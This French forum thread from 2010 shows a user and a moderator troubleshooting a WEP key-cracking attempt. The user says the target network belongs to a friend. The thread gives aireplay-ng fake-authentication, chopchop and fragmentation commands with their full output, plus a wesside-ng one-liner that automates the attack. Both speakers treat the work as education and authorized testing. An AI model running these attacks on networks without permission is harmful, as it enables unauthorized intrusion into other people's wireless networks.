Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-06-2010 01:00:45

Groundersoldier
N00b
Inscription : 05-06-2010
Messages : 3

[WEP] Pas de IVs !

Bonjour à tous,

Alors voila, ca fait maintenant quelque jours que j'essaye de cracker une clef WEP. Lorsqu'une station est connecté et qu'il y a du traffic je n'ai aucun soucis et la clef est crackée en moins d'une heure.

Le problème se pose lorsqu'il n'y a aucune station connecté ... ma clef est D-Link DWA-110 et malheureusement celle ci pose problème (pas d'injection sous BT3) ... n'ayant qu'un live CD de Backtrack j'ai installé une distribution Ubuntu sur une machine virtuelle de VMware pour ne pas avoir à installer le driver qui va bien a chaque démarrage.

J'avoue avoir pas mal galéré (mais pas mal appris aussi :p ) mais ce soir, oh miracle, l'injection fonctionne enfin. Donc tout fière de moi je lance la Fake authentification, je me vois bien en tant que station dans airodump-ng mais je n'arrive pas a faire grimper ces p****n d'IVs hmm

J'ai essayé avec une attaque chopchop ... a priori les seul paquet que je chope ne lui vont pas ...
L'attaque par fragmentation me répond "No reply blabla"
Et la réinjection de paquet ARP (le aireplay-ng -3), aucun paquet arp

Pour ce qui est de la qualité de reception, je capte l'ap à 11% sous windows (~ 2 barres) et je recois quand même pas mal de Beacons frames (genre 2 BF /s a peu près)

Auriez vous une quelconque idée d'où le problème pourrais venir ?

Dernière modification par Groundersoldier (05-06-2010 01:07:35)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-06-2010 10:05:59

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : [WEP] Pas de IVs !

Salut Groundersoldier, bienvenue sur le forum smile

Ôte-moi un doute : c'est bien de TON réseau qu'on parle, là ? Parce quand je lis ça, j'ai comme un mauvais pressentiment...

Groundersoldier a écrit :

ca fait maintenant quelque jours que j'essaye de cracker une clef WEP.

Groundersoldier a écrit :

Lorsqu'une station est connecté et qu'il y a du traffic...
[...]
Le problème se pose lorsqu'il n'y a aucune station connecté...

Groundersoldier a écrit :

je capte l'ap à 11% sous windows (~ 2 barres)

En gros, tu es loin du réseau, et tu n'as pas l'air de contrôler quand une station s'y connecte ou pas... Si c'est ton réseau, le "problème" n'en est pas un, tu n'as qu'à connecter toi-même une seconde station (et en profiter pour te rapprocher) wink
S'il ne s'agit pas de ton réseau, alors arrête tes conneries tout de suite ou c'est le ban direct, la section 3 des règles est assez claires là-dessus...

2 remarques :
- une fakeauth ne suffit pas pour "ajouter un client "au réseau, il faut en plus du trafic généré (ce que tu ne peux pas faire depuis la machine attaquante).
- avec un très bon signal, je reçois environ 300 beacons en 30 secondes, ton "pas mal de beacons" doit être relativisé je pense big_smile

Hors Ligne

#3 05-06-2010 11:43:08

Groundersoldier
N00b
Inscription : 05-06-2010
Messages : 3

Re : [WEP] Pas de IVs !

Oula pas la peine de monter au crénau, je suis étudiant et en cité U, l'ap ciblée n'est effectivement pas la mienne mais celle d'un ami. Celui ci m'a affirmé, et sur de sa connerie, que pour lui un cryptage wep et wpa ca revenais relativement au même à savoir facilement crackable tout les deux. Donc je lui est montré en début de semaine avec un attaque par dico qu'il étais quand même très improbable que sa clef wpa soit crackée. Je lui est ensuite montré qu'avec une clef wep sur une réseau ou il y a du traffic (en boostant à grand de télécahrgements) la clef était fumée en moins d'une heure.

J'essaye maintenant de lui prouver que même sur un réseau ou il n'y a pas de traffic ca reste faisable ... il est donc retourné en filaire en laissant son wifi ouvert.

Donc non je ne peut pas me rapprocher, connecter une seconde station est pour moi inutile puisque, comme je l'ai dit dans mon premier post, avec du traffic la clef est cracké en moins d'une heure et ce n'est pas mon but ici de refaire ce que je lui est déjà montré.

Bref je suis étudiant en Réseau et Télécoms, et le sujet m'intéresse sinon je me serai pas casser le c*l a essayer de faire marcher l'injection.

Hors Ligne

#4 05-06-2010 12:01:02

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : [WEP] Pas de IVs !

OK, excuse ma réponse un peu froide, mais sur ce forum, 3 fois sur 4 quand le message est formulé de cette façon c'est qu'on est face à un script-kiddie (appelons-le Jean-Kévin) qui veut juste se prendre pour un hacker en cassant le WEP du voisin wink
En tant que modérateur, ca fait aussi partie de mon rôle d'être ch*ant et de "monter au créneau", mais maintenant que la situation est clarifiée pas de problème smile

Bon, revenons-en à ton problème. S'il n'y a vraiment aucun trafic, la ChopChop et la Fragmentation risquent de ne pas marcher, en particulier si tu es loin (et donc que tu risques de perdre le peu de paquets que tu peux récupérer).
Tu as essayé l'attaque -p0841 ? Regarde sur la page officielle pour voir comment ca marche --> Attaque -P0841 [aircrack-ng.org]

Tu peux aussi essayer avec des outils comme Spoonwep (ous BT3), GrimWepa/Gerix WiFi cracker (sous BT4 ou Ubuntu), voire même wesside-ng (sous BT4, en console), ils arrivent parfois à bien combiner les attaques clientless pour générer des IV même avec aucun trafic smile

Mais je pense que toutes ces attaques (qui sont malgré tout "avancées") requièrent des bonnes conditions de réception, si tu sais tu devrais utiliser une meilleure carte/antenne (genre Alfa AWUS036H), sinon ca risque d'être un peu limite hmm

[EDIT] Si tu veux moins te prendre la tête avec le matériel, la prochaine fois je te conseille d'essayer directement avec BackTrack 4 et pas BT3 wink

Hors Ligne

#5 05-06-2010 15:23:40

Groundersoldier
N00b
Inscription : 05-06-2010
Messages : 3

Re : [WEP] Pas de IVs !

Oui je comprend, j'aurai dut expliquer la situation dès le début roll

Donc tout d'abord merci de ta réponse.
Je te fais un petit topo de la situation :


L'injection fonctionne bien :


[c][email protected]:~$ sudo aireplay-ng -9 wlan0
open(/dev/rtc) failed: Device or resource busy
15:48:55  Trying broadcast probe requests...
15:48:55  Injection is working!
15:48:57  Found 17 APs


15:49:35  E6:47:63:XX:XX:XX - channel: 11 - 'aliceXXXX'
15:49:37  Ping (min/avg/max): 3.519ms/61.250ms/136.539ms Power: 0.00
15:49:37  26/30:  86%

15:49:16  E6:A6:53:XX:XX:XX - channel: 11 - 'FreeWifi'
15:49:18  Ping (min/avg/max): 7.679ms/67.859ms/91.122ms Power: 0.00
15:49:18  30/30: 100%[/c]



La fake authentification :

[c][email protected]:~$ sudo aireplay-ng -1 30 -e aliceXXXX -a E6:47:63:XX:XX:XX -h 00:1E:58:XX:XX:XX wlan0
15:46:14  Waiting for beacon frame (BSSID: E6:47:63:XX:XX:XX)
15:46:14  Sending Authentication Request
15:46:14  Authentication successful
15:46:14  Sending Association Request
15:46:14  Association successful :-)
15:46:29  Sending keep-alive packet[/c]



L'attaque Chopchop :

[c][email protected]:~$ sudo aireplay-ng -4 wlan0 -a E6:47:63:XX:XX:XX -h 00:1E:58:XX:XX:XX
[sudo] password for raf:
Read 30858 packets...

        Size: 116, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  E6:47:63:XX:XX:XX
          Dest. MAC  =  33:33:FF:XX:XX:XX
         Source MAC  =  00:07:CB:XX:XX:XX

        0x0000:  0842 0000 3333 ff47 2b6e e647 6393 bda4  .B..33.G+n.Gc...
        0x0010:  0007 cbcf c2b8 a063 d370 0100 07b4 63e2  .......c.p....c.
        0x0020:  74f2 fc6a 907e 492a 44e2 23f8 27c0 0cbb  t..j.~I*D.#.'...
        0x0030:  bf29 e2a5 dc29 94f8 750f a00c a728 fd11  .)...)..u....(..
        0x0040:  a37e c492 9735 9b1e 85b4 061c b219 35ca  .~...5........5.
        0x0050:  29bc 5c81 0786 eb45 900e 6a8b 626b c6f5  ).\....E..j.bk..
        0x0060:  dbbd b326 a355 5a08 2920 16e8 a7d1 7e1b  ...&.UZ.) ....~.
        0x0070:  f2cb 199b                                ....

Use this packet ? y

Saving chosen packet in replay_src-0605-155115.cap

Sent 10025 packets, current guess: 01...

The chopchop attack appears to have failed. Possible reasons:
    * You're trying to inject with an unsupported chipset (Centrino?).
    * The driver source wasn't properly patched for injection support.
    * You are too far from the AP. Get closer or reduce the send rate.
    * Target is 802.11g only but you are using a Prism2 or RTL8180.
    * The wireless interface isn't setup on the correct channel.
    * The client MAC you have specified is not currently authenticated.
      Try running another aireplay-ng to fake authentication (attack "-1").
    * The AP isn't vulnerable when operating in authenticated mode.
      Try aireplay-ng in non-authenticated mode instead (no -h option)[/c]



L'attaque par fragmentation :

[c][email protected]:~$ sudo aireplay-ng -5 wlan0 -b E6:47:63:XX:XX:XX -h 00:1E:58:XX:XX:XX
15:53:05  Waiting for beacon frame (BSSID: E6:47:63:XX:XX:XX)
15:53:05  Waiting for a data packet...
Read 19792 packets...

        Size: 116, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  E6:47:63:XX:XX:XX
          Dest. MAC  =  33:33:FF:XX:XX:XX
         Source MAC  =  00:07:CB:XX:XX:XX

        0x0000:  0842 0000 3333 ff47 2b6e e647 6393 bda4  .B..33.G+n.Gc...
        0x0010:  0007 cbcf c2b8 c068 e870 0100 24c0 637a  .......h.p..$.cz
        0x0020:  bda9 74d5 9990 cccb 587d 789c e954 8e72  ..t.....X}x..T.r
        0x0030:  7c77 620a d0da fb29 2b30 b3e5 97c6 1e8f  |wb....)+0......
        0x0040:  d2b9 6d9e 0443 f9bc 205c 0344 922c 6c80  ..m..C.. \.D.,l.
        0x0050:  5ad0 7541 f5f8 8113 966a 032f b210 7483  Z.uA.....j./..t.
        0x0060:  e3e0 be3e a47d 02a4 de0e db9f fed1 cbec  ...>.}..........
        0x0070:  8c65 1ac1                                .e..

Use this packet ? y

Saving chosen packet in replay_src-0605-155615.cap
15:56:22  Data packet found!
15:56:22  Sending fragmented packet
15:56:23  No answer, repeating...
15:56:23  Trying a LLC NULL packet
15:56:23  Sending fragmented packet
15:56:25  No answer, repeating...
15:56:25  Sending fragmented packet
15:56:26  No answer, repeating...
15:56:26  Trying a LLC NULL packet
15:56:26  Sending fragmented packet
15:56:28  No answer, repeating...
15:56:28  Sending fragmented packet
15:56:29  No answer, repeating...
15:56:29  Trying a LLC NULL packet
15:56:29  Sending fragmented packet
15:56:31  No answer, repeating...
15:56:31  Sending fragmented packet
15:56:32  No answer, repeating...
15:56:32  Trying a LLC NULL packet
15:56:32  Sending fragmented packet
15:56:34  No answer, repeating...
15:56:34  Sending fragmented packet
15:56:35  No answer, repeating...
15:56:35  Trying a LLC NULL packet
15:56:35  Sending fragmented packet
15:56:37  No answer, repeating...
15:56:37  Sending fragmented packet
15:56:38  No answer, repeating...
15:56:38  Still nothing, trying another packet...[/c]



Pour ce qui est du -p 0841 je l'ai laisser tourné toute la nuit dernière et a mon réveil il était encore est toujours sur "Read paquets ..."



Sinon j'ai essayé GrimpWepa mais j'obtient un vieux message d'erreur quand je scan sad  :

[c][email protected]:~$ sudo java -jar grimwepa_1.0.jar
Error: FileNotFoundException: File: /home/raf/targets-01.csv
airodump-ng csv file was not found. The command GrimWepa used was:
[Ljava.lang.String;@dd20f6
xterm -fg green -bg black -bd green -geom 100x15+0+0 -T GrimWepa-TargetScan -iconic -e airodump-ng -c 11 -w /home/raf/targets --output-format csv wlan0
If this command does not create a file 'targets.csv' when YOU run it, then there must be a problem with your airodump-ng, your user permissions in linux, or something else out of my control![/c]



A priori si j'ai bien compris il n'arrive pas creer le fichier de capture dans mon dossier perso, j'ai essayé de réglé les droits mais toujours rien :

[c][email protected]:/home$ ls -l
total 4
drwxrwxrwx 24 raf raf 4096 2010-06-05 15:29 raf
[email protected]:/home$ [/c]

Une idée ?

Dernière modification par Groundersoldier (05-06-2010 15:26:31)

Hors Ligne

#6 05-06-2010 15:39:22

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : [WEP] Pas de IVs !

Ah, ouais, d'jeust j'avais oublié que t'étais sous BT3... L'habitude, tout ca tongue

En voyant ca, je pense que ce sont tes conditions de réception qui sont en cause, comme je le craignais. Pour faire simple, les attaques clientless (ChopChop & Frag) se basent sur des paquets successifs pour déduire à chaque fois un peu d"info. Si tu perds un paquet de la séquence c'est mort (d"ailleurs il te le dit pour la chopchop : "You are too far from the AP. Get closer or reduce the send rate."). Pour la -p0841 je ne suis plus sûr, mais je crois que c'est un truc du genre aussi hmm Donc à moins de te rapprocher ou de changer d'antenne, ca risque d'être compliqué...

Pour ce qui est de GrimWepa, il est prévu pour les dernières versions d'Aircrack, et les types de fichiers utilisés ont changé : maintenant Airodump stocke ses résultats dans un fichier .CSV, ce qui n'est pas le cas avec ton (ancienne) version, donc GrimWepa ne retrouve pas ses jeunes smile

Solution : mettre aircrack à jour, si tu ne connais pas encore le SVN tu vas apprendre big_smile
Allez, hop :

cd /pentest/wireless
svn update aircrack-ng
make unstable=true install
airodump-ng-oui-update

Tu as maintenant la dernière version d'aircrack smile réessaie, GrimWepa devrait être content avec ca.

Au passage, je suppose que tu as noté l'option "unstable=true" lors de la compilation (make) ? Elle sert à compiler également les outils "annexes" d'Aircrack, dont wesside-ng. Tu peux le lancer comme ca : [c]wesside-ng -v E6:47:63:XX:XX:XX -i wlan0[/c] et (dans la mesure du possible) il va automatiser toute l'attaque wink

Tant qu'à faire, si tu es sous BT3 et que tu ne veux pas mettre Aircrack à jour, utilise directement Spoonwep2, il est aussi simple (sinon +) smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]